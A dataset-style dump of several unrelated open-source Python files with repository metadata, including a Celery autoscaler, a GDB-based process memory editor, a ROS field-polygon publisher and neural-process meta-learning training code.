assert f"server {external_name_setup.external_host}:80 max_fails=1 fail_timeout=10s max_conns=0 resolve;"\
in result_conf
| 59.504274
| 119
| 0.654984
|
7f986ac05901fa9ae21da24fca58fd455d3ee02f
| 563
|
py
|
Python
|
varvar/__init__.py
|
drorspei/varvar
|
1f7daf6d82cdfdce396f9eb81b54a5f470411641
|
[
"MIT"
] | null | null | null |
varvar/__init__.py
|
drorspei/varvar
|
1f7daf6d82cdfdce396f9eb81b54a5f470411641
|
[
"MIT"
] | null | null | null |
varvar/__init__.py
|
drorspei/varvar
|
1f7daf6d82cdfdce396f9eb81b54a5f470411641
|
[
"MIT"
] | null | null | null |
import threading
def htrain(*args, **kwargs):
from varvar.htrees import multiplicative_variance_trees as _htrain
return _htrain(*args, **kwargs)
def qtrain(*args, **kwargs):
from varvar.qtrees import multiplicative_variance_trees as _qtrain
return _qtrain(*args, **kwargs)
def predict(*args, **kwargs):
from varvar.predict import predict as _predict
return _predict(*args, **kwargs)
def import_():
import varvar.qtrees
import varvar.htrees
import varvar.predict
_thread = threading.Thread(target=import_)
_thread.start()
| 24.478261
| 70
| 0.737123
|
98beeda8c7af38c0e928ee2a3dd0522d19a67bcd
| 156
|
py
|
Python
|
src/vone/admin.py
|
SerhatTeker/django-rest-todo
|
5934ba552a95d3960f9344fde6c2586017774403
|
[
"BSD-3-Clause"
] | 1
|
2021-06-28T14:59:35.000Z
|
2021-06-28T14:59:35.000Z
|
src/vone/admin.py
|
SerhatTeker/django-rest-todo
|
5934ba552a95d3960f9344fde6c2586017774403
|
[
"BSD-3-Clause"
] | 1
|
2022-01-21T20:02:37.000Z
|
2022-01-21T20:02:37.000Z
|
src/vone/admin.py
|
SerhatTeker/django-rest-todo
|
5934ba552a95d3960f9344fde6c2586017774403
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib import admin
from .models import Category, Tag, Task
admin.site.register(Tag)
admin.site.register(Category)
admin.site.register(Task)
| 19.5
| 39
| 0.801282
|
f04b8bc94d9bf1c72b0d339620fbed170a4bb947
| 2,160
|
py
|
Python
|
data/single_item_dataset.py
|
Finomnis/pytorch-CycleGAN-and-pix2pix
|
a10b70da7e366bde9012311f3f8a1c4dc14d922d
|
[
"BSD-3-Clause"
] | null | null | null |
data/single_item_dataset.py
|
Finomnis/pytorch-CycleGAN-and-pix2pix
|
a10b70da7e366bde9012311f3f8a1c4dc14d922d
|
[
"BSD-3-Clause"
] | null | null | null |
data/single_item_dataset.py
|
Finomnis/pytorch-CycleGAN-and-pix2pix
|
a10b70da7e366bde9012311f3f8a1c4dc14d922d
|
[
"BSD-3-Clause"
] | null | null | null |
import os.path
from data.base_dataset import BaseDataset, get_params, get_transform
from data.image_folder import make_dataset
from PIL import Image
class SingleItemDataset(BaseDataset):
"""A dataset class for a single image.
"""
def __init__(self, opt, imgIn, imgOut=None):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.imgIn = imgIn.convert('RGB')
self.imgOut = imgOut
if not imgOut:
self.imgOut = Image.new('RGB', imgIn.size, (255, 255, 2555))
assert(self.opt.load_size >= self.opt.crop_size) # crop_size should be smaller than the size of loaded image
self.input_nc = self.opt.output_nc if self.opt.direction == 'BtoA' else self.opt.input_nc
self.output_nc = self.opt.input_nc if self.opt.direction == 'BtoA' else self.opt.output_nc
def __getitem__(self, index):
"""Return a data point and its metadata information.
Parameters:
index - - a random integer for data indexing
Returns a dictionary that contains A, B, A_paths and B_paths
A (tensor) - - an image in the input domain
B (tensor) - - its corresponding image in the target domain
A_paths (str) - - image paths
B_paths (str) - - image paths (same as A_paths)
"""
# read a image given a random integer index
A = self.imgIn
B = self.imgOut
# apply the same transform to both A and B
transform_params = get_params(self.opt, A.size)
A_transform = get_transform(self.opt, transform_params, grayscale=(self.input_nc == 1), add_noise=self.opt.add_noise)
B_transform = get_transform(self.opt, transform_params, grayscale=(self.output_nc == 1))
A = A_transform(A)
B = B_transform(B)
return {'A': A.unsqueeze(0), 'B': B.unsqueeze(0), 'A_paths': "", 'B_paths': ""}
def __len__(self):
"""Return the total number of images in the dataset."""
return 1
| 37.894737
| 125
| 0.6375
|
5175a761f704421f8f761a3e177f7f0eebe8ebea
| 1,505
|
py
|
Python
|
tests/system/data_sources/deploy_cloudsql/gcloud_context.py
|
ajw0100/professional-services-data-validator
|
b1dc82adf92adf19702f5ef41590c62c7c128c74
|
[
"Apache-2.0"
] | 167
|
2021-05-27T19:43:43.000Z
|
2022-03-16T02:42:30.000Z
|
tests/system/data_sources/deploy_cloudsql/gcloud_context.py
|
ajw0100/professional-services-data-validator
|
b1dc82adf92adf19702f5ef41590c62c7c128c74
|
[
"Apache-2.0"
] | 110
|
2021-05-27T14:49:09.000Z
|
2022-03-31T11:10:41.000Z
|
tests/system/data_sources/deploy_cloudsql/gcloud_context.py
|
ajw0100/professional-services-data-validator
|
b1dc82adf92adf19702f5ef41590c62c7c128c74
|
[
"Apache-2.0"
] | 32
|
2021-06-23T22:00:59.000Z
|
2022-03-30T03:32:20.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Context manager for gcloud which redirects config directory to temp location """
import os
import subprocess
class GCloudContext(object):
def __init__(self, project_id, creds_file=None):
self._project_id = project_id
self._creds_file = creds_file
def __enter__(self):
if self._creds_file:
self.Run("auth", "activate-service-account", "--key-file", self._creds_file)
self.Run("config", "set", "project", self._project_id)
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
pass
def Run(self, *args, **kwargs):
""" Runs gcloud command and returns output"""
env = kwargs.pop("env", None)
if not env:
env = os.environ.copy()
env["CLOUDSDK_CORE_PRINT_UNHANDLED_TRACEBACKS"] = "true"
fullcmd = ("gcloud",) + args
return subprocess.check_output(fullcmd, env=env, **kwargs)
| 35
| 88
| 0.686379
|
188a94cea521cb01f861cbddba827713ab486a03
| 2,505
|
py
|
Python
|
celery/worker/autoscale.py
|
frac/celery
|
b6b32ca9a951e81722c52412c3f8a1cff67109dd
|
[
"BSD-3-Clause"
] | 1
|
2015-11-05T02:49:59.000Z
|
2015-11-05T02:49:59.000Z
|
celery/worker/autoscale.py
|
frac/celery
|
b6b32ca9a951e81722c52412c3f8a1cff67109dd
|
[
"BSD-3-Clause"
] | null | null | null |
celery/worker/autoscale.py
|
frac/celery
|
b6b32ca9a951e81722c52412c3f8a1cff67109dd
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
import threading
import traceback
from time import sleep, time
from celery.worker import state
class Autoscaler(threading.Thread):
def __init__(self, pool, max_concurrency, min_concurrency=0,
keepalive=30, logger=None):
threading.Thread.__init__(self)
self.pool = pool
self.max_concurrency = max_concurrency
self.min_concurrency = min_concurrency
self.keepalive = keepalive
self.logger = logger
self._last_action = None
self._shutdown = threading.Event()
self._stopped = threading.Event()
self.setDaemon(True)
self.setName(self.__class__.__name__)
assert self.keepalive, "can't scale down too fast."
def scale(self):
current = min(self.qty, self.max_concurrency)
if current > self.processes:
self.scale_up(current - self.processes)
elif current < self.processes:
self.scale_down((self.processes - current) - self.min_concurrency)
sleep(1.0)
def scale_up(self, n):
self.logger.info("Scaling up %s processes." % (n, ))
self._last_action = time()
return self.pool.grow(n)
def scale_down(self, n):
if not self._last_action or not n:
return
if time() - self._last_action > self.keepalive:
self.logger.info("Scaling down %s processes." % (n, ))
self._last_action = time()
try:
self.pool.shrink(n)
except ValueError:
self.logger.debug(
"Autoscaler won't scale down: all processes busy.")
except Exception, exc:
self.logger.error("Autoscaler: scale_down: %r\n%r" % (
exc, traceback.format_stack()),
exc_info=sys.exc_info())
def run(self):
while not self._shutdown.isSet():
try:
self.scale()
except Exception, exc:
self.logger.error("Thread Autoscaler crashed: %r" % (exc, ),
exc_info=sys.exc_info())
os._exit(1)
self._stopped.set()
def stop(self):
self._shutdown.set()
self._stopped.wait()
if self.isAlive():
self.join(1e10)
@property
def qty(self):
return len(state.reserved_requests)
@property
def processes(self):
return self.pool._pool._processes
| 30.925926
| 78
| 0.57006
|
3382bf834e7b411a060a6f6b1f352083713ece9b
| 2,093
|
py
|
Python
|
binject/gdb.py
|
torpedro/binject.py
|
9652b48aeb2663c49b3ec154d9186c9c6cac89cf
|
[
"MIT"
] | 1
|
2016-02-17T22:01:01.000Z
|
2016-02-17T22:01:01.000Z
|
binject/gdb.py
|
torpedro/binject.py
|
9652b48aeb2663c49b3ec154d9186c9c6cac89cf
|
[
"MIT"
] | null | null | null |
binject/gdb.py
|
torpedro/binject.py
|
9652b48aeb2663c49b3ec154d9186c9c6cac89cf
|
[
"MIT"
] | null | null | null |
from time import sleep
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from edit import AbstractByteEditor
def logStdoutThread(p, gdb):
for c in iter(lambda: p.stdout.read(1), ''):
gdb.onStdout(c)
class GDBWrapper(AbstractByteEditor):
"""docstring for GDBWrapper"""
def __init__(self, pid, gdb="gdb"):
super(GDBWrapper, self).__init__()
self._gdb = gdb
self._pid = pid
self._lines = [""]
def onStdout(self, c):
if len(c) > 1:
for d in c:
self.onStdout(d)
else:
if c == "\n":
# print self._lines[-1]
self._lines.append("")
else:
self._lines[-1] += c
def writeToStdin(self, line):
line = "%s\n" % (line)
self.onStdout(line)
self._p.stdin.write(line)
self._p.stdin.flush()
def _waitForPrompt(self):
while self._lines[-1].startswith("(gdb)") is False:
sleep(0.001)
def open(self):
p = Popen([self._gdb, "-p", str(self._pid)], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
self._p = p
t = Thread(target=logStdoutThread, args=(p, self))
t.start()
self._isOpen = True
self._waitForPrompt()
def quit(self):
self.writeToStdin("quit\n")
self.writeToStdin("y")
def getByte(self, address):
self.writeToStdin("x/ubfx %s" % (address))
# self.writeToStdin("p *(char*)%s" % (address))
self._waitForPrompt()
res = self._lines[-2]
print "[Result] ", res
# TODO return
def setByteInt(self, address, intvalue):
self.writeToStdin("set (*(char*)%s) = %d" % (address, intvalue))
self._waitForPrompt()
res = self._lines[-2]
# print res
def setByteHex(self, address, hexvalue):
return self.setByteInt(address, int(hexvalue, 16))
def wait(self):
self._p.wait()
def close(self):
self.quit()
self.wait()
self._isOpen = False
| 24.623529
| 92
| 0.547062
|
90a78b912a5f23dbfc8a9c4efeee839a21a843e4
| 73
|
py
|
Python
|
test.py
|
charisschomba/Password-Generator
|
9f4bcee5f008ca98c91f9722630bc9b120e0ecd2
|
[
"MIT"
] | null | null | null |
test.py
|
charisschomba/Password-Generator
|
9f4bcee5f008ca98c91f9722630bc9b120e0ecd2
|
[
"MIT"
] | null | null | null |
test.py
|
charisschomba/Password-Generator
|
9f4bcee5f008ca98c91f9722630bc9b120e0ecd2
|
[
"MIT"
] | null | null | null |
from password_generator import password_generator
password_generator(20)
| 24.333333
| 49
| 0.90411
|
0587045a70a089d0e2fb0c2508b2623eba5fd3c0
| 3,700
|
py
|
Python
|
automow_maps/scripts/field_publisher.py
|
Auburn-Automow/au_automow_common
|
920be6a740aa6d738e9954417b41490e353efd04
|
[
"BSD-3-Clause"
] | 43
|
2016-03-05T17:06:29.000Z
|
2022-03-10T08:50:46.000Z
|
automow_maps/scripts/field_publisher.py
|
qintxwd/au_automow_common
|
920be6a740aa6d738e9954417b41490e353efd04
|
[
"BSD-3-Clause"
] | 2
|
2017-07-10T12:43:49.000Z
|
2019-03-13T13:57:31.000Z
|
automow_maps/scripts/field_publisher.py
|
qintxwd/au_automow_common
|
920be6a740aa6d738e9954417b41490e353efd04
|
[
"BSD-3-Clause"
] | 22
|
2016-03-23T06:10:52.000Z
|
2022-03-10T08:50:49.000Z
|
#!/usr/bin/env python
"""
This ROS node takes the field survey file and publishes a
field polygon as a geometry_msgs/PolygonStamped for use in
other nodes and for visualization in rviz.
"""
import roslib; roslib.load_manifest('automow_maps')
import rospy
from geometry_msgs.msg import PolygonStamped, Point32, Polygon
class FieldPublisherNode(object):
"""
This is a ROS node that is responsible for publishing the field.
"""
def __init__(self):
# Setup ROS node
rospy.init_node('field_publisher')
# Get ROS parameters
self.field_polygon = rospy.get_param("~field_polygon")
self.field_frame_id = rospy.get_param("~field_frame_id", "odom")
# Setup publishers and subscribers
safety_pub = rospy.Publisher('/field/safety', PolygonStamped, latch=True)
boundry_pub = rospy.Publisher('/field/boundry', PolygonStamped, latch=True)
cut_area_pub = rospy.Publisher('/field/cut_area', PolygonStamped, latch=True)
# Read the field in
if self.read_field_file():
# Publish the msg once, it is latched so no need to repeat
safety_pub.publish(self.safety_msg)
boundry_pub.publish(self.boundry_msg)
cut_area_pub.publish(self.cut_area_msg)
# Spin
rospy.spin()
def read_field_file(self):
# Setup msgs
self.safety_msg = PolygonStamped()
self.boundry_msg = PolygonStamped()
self.cut_area_msg = PolygonStamped()
self.safety_msg.header.stamp = rospy.Time.now()
self.safety_msg.header.frame_id = self.field_frame_id
self.boundry_msg.header = self.safety_msg.header
self.cut_area_msg.header = self.safety_msg.header
# Parse out the points
polygon_points = []
polygon_points32 = []
point_count = 0
for point in self.field_polygon:
point_count += 1
if point['fix_type'] < 3:
rospy.logwarn('Point %i has a low quality fix type of %i'
% (point_count, point['fix_type']))
(easting, northing) = (point['easting'], point['northing'])
polygon_points.append((float(easting), float(northing)))
polygon_points32.append(Point32(float(easting), float(northing), 0))
# Put the points into the boundry_msg
self.boundry_msg.polygon = Polygon(polygon_points32)
# Expand and contract the field shape for safety buffer and cut area
safety_points = self.offset_polygon(polygon_points, 2)
cut_area_points = self.offset_polygon(polygon_points, -0.5)
self.safety_msg.polygon = Polygon(safety_points)
self.cut_area_msg.polygon = Polygon(cut_area_points)
return True
def offset_polygon(self, points, offset):
import polygon_offset
from polygon_offset import getinsetpoint
temp_points = []
polygon_offset.OFFSET = -offset
for i in range(len(points)-2):
temp_points.append(getinsetpoint(points[i],
points[i+1],
points[i+2]))
temp_points.append(getinsetpoint(points[-2],
points[-1],
points[0]))
temp_points.append(getinsetpoint(points[-1],
points[0],
points[1]))
result = []
for point in temp_points:
result.append(Point32(point[0], point[1], 0))
return result
if __name__ == '__main__':
fpn = FieldPublisherNode()
| 37
| 85
| 0.605405
|
a95ab201c298bf9c8eb8497f2f7d6fcc6aab2b40
| 15,079
|
py
|
Python
|
meta_augmentation/pose_regression/np_vanilla.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-19T04:26:12.000Z
|
2022-03-19T04:26:12.000Z
|
meta_augmentation/pose_regression/np_vanilla.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | null | null | null |
meta_augmentation/pose_regression/np_vanilla.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-30T07:20:29.000Z
|
2022-03-30T07:20:29.000Z
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: skip-file
"""NP vanilla.
Based on code by Mingzhang Yin (https://github.com/google-research/google-research/tree/master/meta_learning_without_memorization)
"""
from __future__ import print_function
import functools
import os
import pickle
import time
from absl import app
from absl import flags
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.compat.v1.keras.layers import Conv2D
from tensorflow.compat.v1.keras.layers import MaxPooling2D
#tf.compat.v1.enable_v2_tensorshape()
FLAGS = flags.FLAGS
## Dataset/method options
flags.DEFINE_float('beta', 0.001, 'the beta for weight decay')
flags.DEFINE_bool('weight_decay', False, 'whether or not to use weight decay')
flags.DEFINE_string('logdir', '/tmp/data',
'directory for summaries and checkpoints.')
flags.DEFINE_string('data_dir', None,
'Directory of data files.')
get_data_dir = lambda: FLAGS.data_dir
flags.DEFINE_list('data', ['train_data_ins.pkl', 'val_data_ins.pkl'],
'data name')
flags.DEFINE_integer('update_batch_size', 15, 'number of context/target')
flags.DEFINE_integer('meta_batch_size', 10, 'number of tasks')
flags.DEFINE_integer('dim_im', 128, 'image size')
flags.DEFINE_integer('dim_y', 1, 'dimension of y')
## Training options
flags.DEFINE_list('n_hidden_units_g', [100, 100],
'number of tasks sampled per meta-update')
flags.DEFINE_list('n_hidden_units_r', [100, 100],
'number of inner gradient updates during test.')
flags.DEFINE_integer('dim_z', 64, 'dimension of z')
flags.DEFINE_integer('dim_r', 100, 'dimension of r for aggregating')
flags.DEFINE_float('update_lr', 0.001, 'lr')
flags.DEFINE_integer('num_updates', 140000, 'num_updates')
flags.DEFINE_integer('trial', 1, 'trial number')
flags.DEFINE_integer(
'num_classes', 1,
'number of classes used in classification (e.g. 5-way classification).')
flags.DEFINE_bool('deterministic', True, 'deterministic encoder')
## IB options
flags.DEFINE_integer('dim_w', 64, 'dimension of w')
flags.DEFINE_float('facto', 1.0, 'zero out z to memorize or not')
flags.DEFINE_integer('num_noise', 0, 'Discrete noise augmentation.')
flags.DEFINE_float('noise_scale', 0, 'Add noise')
flags.DEFINE_bool('testing', True, 'Set True for evaluating on test split.')
NOISE_PREFIX='v3'
def get_batch(x, y, is_training):
"""Get data batch."""
xs, ys, xq, yq = [], [], [], []
for _ in range(FLAGS.meta_batch_size):
# sample WAY classes
classes = np.random.choice(
range(np.shape(x)[0]), size=FLAGS.num_classes, replace=False)
support_set = []
query_set = []
support_sety = []
query_sety = []
for k in list(classes):
# sample SHOT and QUERY instances
idx = np.random.choice(
range(np.shape(x)[1]),
size=FLAGS.update_batch_size + FLAGS.update_batch_size,
replace=False)
x_k = x[k][idx]
# Ranges from (0, 1)
y_k = y[k][idx].copy()
if FLAGS.num_noise and is_training:
noise_values = np.linspace(0, 1, FLAGS.num_noise+1)[:-1]
noise = np.random.choice(noise_values)
y_k = (y_k + noise) % 1.0
elif FLAGS.noise_scale and is_training:
scale = FLAGS.noise_scale
low, high = -scale, scale
y_k = (y_k + np.random.uniform(low, high)) % 1.0
support_set.append(x_k[:FLAGS.update_batch_size])
query_set.append(x_k[FLAGS.update_batch_size:])
support_sety.append(y_k[:FLAGS.update_batch_size])
query_sety.append(y_k[FLAGS.update_batch_size:])
xs_k = np.concatenate(support_set, 0)
xq_k = np.concatenate(query_set, 0)
ys_k = np.concatenate(support_sety, 0)
yq_k = np.concatenate(query_sety, 0)
xs.append(xs_k)
xq.append(xq_k)
ys.append(ys_k)
yq.append(yq_k)
xs, ys = np.stack(xs, 0), np.stack(ys, 0)
xq, yq = np.stack(xq, 0), np.stack(yq, 0)
xs = np.reshape(
xs,
[FLAGS.meta_batch_size, FLAGS.update_batch_size * FLAGS.num_classes, -1])
xq = np.reshape(
xq,
[FLAGS.meta_batch_size, FLAGS.update_batch_size * FLAGS.num_classes, -1])
xs = xs.astype(np.float32) / 255.0
xq = xq.astype(np.float32) / 255.0
ys = ys.astype(np.float32) * 10.0
yq = yq.astype(np.float32) * 10.0
return xs, ys, xq, yq
def gen(x, y, is_training):
while True:
yield get_batch(np.array(x), np.array(y), is_training)
def sampling(output):
mu, logstd = tf.split(output, num_or_size_splits=2, axis=-1)
sigma = tf.nn.softplus(logstd)
ws = mu + tf.random_normal(tf.shape(mu)) * sigma
return ws, mu, sigma
def mse(pred, label):
pred = tf.reshape(pred, [-1])
label = tf.reshape(label, [-1])
return tf.reduce_mean(tf.square(pred - label))
def encoder_r(xys):
"""Define encoder."""
with tf.variable_scope('encoder_r', reuse=tf.AUTO_REUSE):
hidden_layer = xys
# First layers are relu
for i, n_hidden_units in enumerate(FLAGS.n_hidden_units_r):
hidden_layer = tf.layers.dense(
hidden_layer,
n_hidden_units,
activation=tf.nn.relu,
name='encoder_r_{}'.format(i),
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
# Last layer is simple linear
i = len(FLAGS.n_hidden_units_r)
r = tf.layers.dense(
hidden_layer,
FLAGS.dim_r,
name='encoder_r_{}'.format(i),
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
return r
def encoder_w(xs, encoder_w0):
"""xs is [n_task, n_im, dim_x]; return [n_task, n_im, dim_w]."""
n_task = tf.shape(xs)[0]
n_im = tf.shape(xs)[1]
xs = tf.reshape(xs, [-1, 128, 128, 1])
ws = encoder_w0(xs)
ws = tf.reshape(ws, [n_task, n_im, FLAGS.dim_w])
return ws
def xy_to_z(xs, ys, encoder_w0):
r"""ws = T0(xs), rs = T1(ws, ys), r = mean(rs), z \sim N(mu(r), sigma(r))."""
with tf.variable_scope(''):
ws = encoder_w(xs, encoder_w0) # (n_task * n_im_per_task) * dim_w
transformed_ys = tf.layers.dense(
ys,
FLAGS.dim_w // 4,
name='lift_y',
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
wys = tf.concat([ws, transformed_ys],
axis=-1) # n_task * n_im_per_task * (dim_w+dim_transy)
rs = encoder_r(wys) # n_task * n_im_per_task * dim_r
r = tf.reduce_mean(rs, axis=1, keepdims=True) # n_task * 1 * dim_r
if FLAGS.deterministic:
z_sample = tf.layers.dense(
r,
FLAGS.dim_z,
name='r2z',
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
else:
z = tf.layers.dense(
r,
FLAGS.dim_z + FLAGS.dim_z,
name='r2z',
reuse=tf.AUTO_REUSE,
kernel_initializer='normal')
z_sample, _, _ = sampling(z)
return tf.tile(z_sample, [1, FLAGS.update_batch_size, 1]) # tile n_targets
def construct_model(input_tensors, encoder_w0, decoder0, prefix=None):
"""Construct model."""
facto = tf.placeholder_with_default(1.0, ())
context_xs = input_tensors['inputa']
context_ys = input_tensors['labela']
target_xs = input_tensors['inputb']
target_ys = input_tensors['labelb']
# sample ws ~ w|(x_all,a), rs = T(ws, ys), r = mean(rs), z = T(r)
# x_all = tf.concat([context_xs, target_xs], axis=1) #n_task * 20 * (128*128)
# y_all = tf.concat([context_ys, target_ys], axis=1)
x_all = context_xs
y_all = context_ys
# n_task * [n_im] * d_z
if 'train' in prefix:
z_samples = xy_to_z(x_all, y_all, encoder_w0) * facto
else:
z_samples = xy_to_z(context_xs, context_ys, encoder_w0) * facto
target_ws = encoder_w(target_xs, encoder_w0)
input_zxs = tf.concat([z_samples, target_ws], axis=-1)
# sample y_hat ~ y|(w,z)
with tf.variable_scope('decoder'):
target_yhat_mu = decoder0(input_zxs) # n_task * n_im * dim_y
# when var of p(y | x,z) is fixed, neg-loglik <=> MSE
mse_loss = mse(target_yhat_mu, target_ys)
tf.summary.scalar(prefix + 'mse', mse_loss)
optimizer1 = tf.train.AdamOptimizer(FLAGS.update_lr)
optimizer2 = tf.train.AdamOptimizer(FLAGS.update_lr)
if 'train' in prefix:
if FLAGS.weight_decay:
loss = mse_loss
optimizer = contrib_opt.AdamWOptimizer(
weight_decay=FLAGS.beta, learning_rate=FLAGS.update_lr)
gvs = optimizer.compute_gradients(loss)
train_op = optimizer.apply_gradients(gvs)
else:
THETA = ( # pylint: disable=invalid-name
tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='decoder')
+ tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='encoder_w'))
all_var = tf.trainable_variables()
PHI = [v for v in all_var if v not in THETA] # pylint: disable=invalid-name
loss = mse_loss
gvs_theta = optimizer1.compute_gradients(loss, THETA)
train_theta_op = optimizer1.apply_gradients(gvs_theta)
gvs_phi = optimizer2.compute_gradients(loss, PHI)
train_phi_op = optimizer2.apply_gradients(gvs_phi)
with tf.control_dependencies([train_theta_op, train_phi_op]):
train_op = tf.no_op()
return mse_loss, train_op, facto
else:
return mse_loss
def main(_):
encoder_w0 = tf.keras.Sequential([
Conv2D(
filters=32,
kernel_size=3,
strides=(2, 2),
activation='relu',
padding='same'),
Conv2D(
filters=48,
kernel_size=3,
strides=(2, 2),
activation='relu',
padding='same'),
MaxPooling2D(pool_size=(2, 2)),
Conv2D(
filters=64,
kernel_size=3,
strides=(2, 2),
activation='relu',
padding='same'),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(FLAGS.dim_w),
])
decoder0 = tf.keras.Sequential([
tf.keras.layers.Dense(100, activation=tf.nn.relu),
tf.keras.layers.Dense(100, activation=tf.nn.relu),
tf.keras.layers.Dense(FLAGS.dim_y),
])
dim_output = FLAGS.dim_y
dim_input = FLAGS.dim_im * FLAGS.dim_im * 1
exp_basename = 'np_vanilla'
if FLAGS.noise_scale:
exp_basename = 'np_vanilla_noised_scale' + str(FLAGS.noise_scale)
elif FLAGS.num_noise > 0:
exp_basename = 'np_vanilla_noise' + str(FLAGS.num_noise)
if FLAGS.weight_decay:
exp_name = '%s.update_lr-%g.beta-%g.trial-%d' % (
exp_basename, FLAGS.update_lr, FLAGS.beta, FLAGS.trial)
else:
exp_name = '%s.update_lr-%g.trial-%d' % (exp_basename, FLAGS.update_lr,
FLAGS.trial)
if FLAGS.testing:
exp_name += "-test"
checkpoint_dir = os.path.join(FLAGS.logdir, exp_name)
if FLAGS.testing:
data = [FLAGS.data[0], FLAGS.data[1]]
else:
data = [FLAGS.data[0], FLAGS.data[0]]
x_train, y_train = pickle.load(
tf.io.gfile.GFile(os.path.join(get_data_dir(), data[0]), 'rb'))
x_val, y_val = pickle.load(
tf.io.gfile.GFile(os.path.join(get_data_dir(), data[1]), 'rb'))
if not FLAGS.testing:
# Split the train dataset into val and train
x_train, y_train = x_train[:-5], y_train[:-5]
x_val, y_val = x_val[-5:], y_val[-5:]
x_train, y_train = np.array(x_train), np.array(y_train)
y_train = y_train[:, :, -1, None]
x_val, y_val = np.array(x_val), np.array(y_val)
y_val = y_val[:, :, -1, None]
ds_train = tf.data.Dataset.from_generator(
functools.partial(gen, x_train, y_train, True),
(tf.float32, tf.float32, tf.float32, tf.float32),
(tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_input]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_output]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_input]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_output])))
ds_val = tf.data.Dataset.from_generator(
functools.partial(gen, x_val, y_val, False),
(tf.float32, tf.float32, tf.float32, tf.float32),
(tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_input]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_output]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_input]),
tf.TensorShape(
[None, FLAGS.update_batch_size * FLAGS.num_classes, dim_output])))
inputa, labela, inputb, labelb = ds_train.make_one_shot_iterator().get_next()
input_tensors = {'inputa': inputa,\
'inputb': inputb,\
'labela': labela, 'labelb': labelb}
inputa_val, labela_val, inputb_val, labelb_val = ds_val.make_one_shot_iterator(
).get_next()
metaval_input_tensors = {'inputa': inputa_val,\
'inputb': inputb_val,\
'labela': labela_val, 'labelb': labelb_val}
loss, train_op, facto = construct_model(
input_tensors, encoder_w0, decoder0, prefix='metatrain_')
loss_val = construct_model(
metaval_input_tensors, encoder_w0, decoder0, prefix='metaval_')
###########
summ_op = tf.summary.merge_all()
sess = tf.InteractiveSession()
summary_writer = tf.summary.FileWriter(checkpoint_dir, sess.graph)
tf.global_variables_initializer().run()
PRINT_INTERVAL = 50 # pylint: disable=invalid-name
SUMMARY_INTERVAL = 5 # pylint: disable=invalid-name
val_step=[]
train_k, val_k = [], []
# scratch buffers
prelosses, prelosses_val = [], []
old_time = time.time()
for itr in range(FLAGS.num_updates):
feed_dict = {facto: FLAGS.facto}
if itr % SUMMARY_INTERVAL == 0:
summary, cost, cost_val = sess.run([summ_op, loss, loss_val], feed_dict)
summary_writer.add_summary(summary, itr)
prelosses.append(cost) # 0 step loss on training set
prelosses_val.append(cost_val) # 0 step loss on meta_val training set
sess.run(train_op, feed_dict)
if (itr != 0) and itr % PRINT_INTERVAL == 0:
val_step.append(itr)
print('Iteration ' + str(itr) + ': ' + str(np.mean(prelosses)), 'time =',
time.time() - old_time)
prelosses = []
old_time = time.time()
print('Validation results: ' + str(np.mean(prelosses_val)))
# Dump (theres no inner loss?)
train_k.append(np.mean(prelosses))
val_k.append(np.mean(prelosses_val))
all_ = (val_step, train_k, val_k)
pickle.dump(all_, open(os.path.join(checkpoint_dir, 'results.p'), 'wb'))
prelosses_val = []
prelosses = []
if __name__ == '__main__':
app.run(main)
| 33.658482
| 130
| 0.654752
|
6468332db8de40570bf841ed76a14f42216da9e2
| 6,140
|
py
|
Python
|
tests/unit/commands/local/lib/swagger/test_parser.py
|
paoptu023/aws-sam-cli
|
e382d603f739e9694d64f622daa228ccfe4581f4
|
[
"Apache-2.0"
] | 1
|
2019-06-27T15:18:46.000Z
|
2019-06-27T15:18:46.000Z
|
tests/unit/commands/local/lib/swagger/test_parser.py
|
paoptu023/aws-sam-cli
|
e382d603f739e9694d64f622daa228ccfe4581f4
|
[
"Apache-2.0"
] | 3
|
2020-01-27T05:20:12.000Z
|
2020-10-03T01:01:11.000Z
|
tests/unit/commands/local/lib/swagger/test_parser.py
|
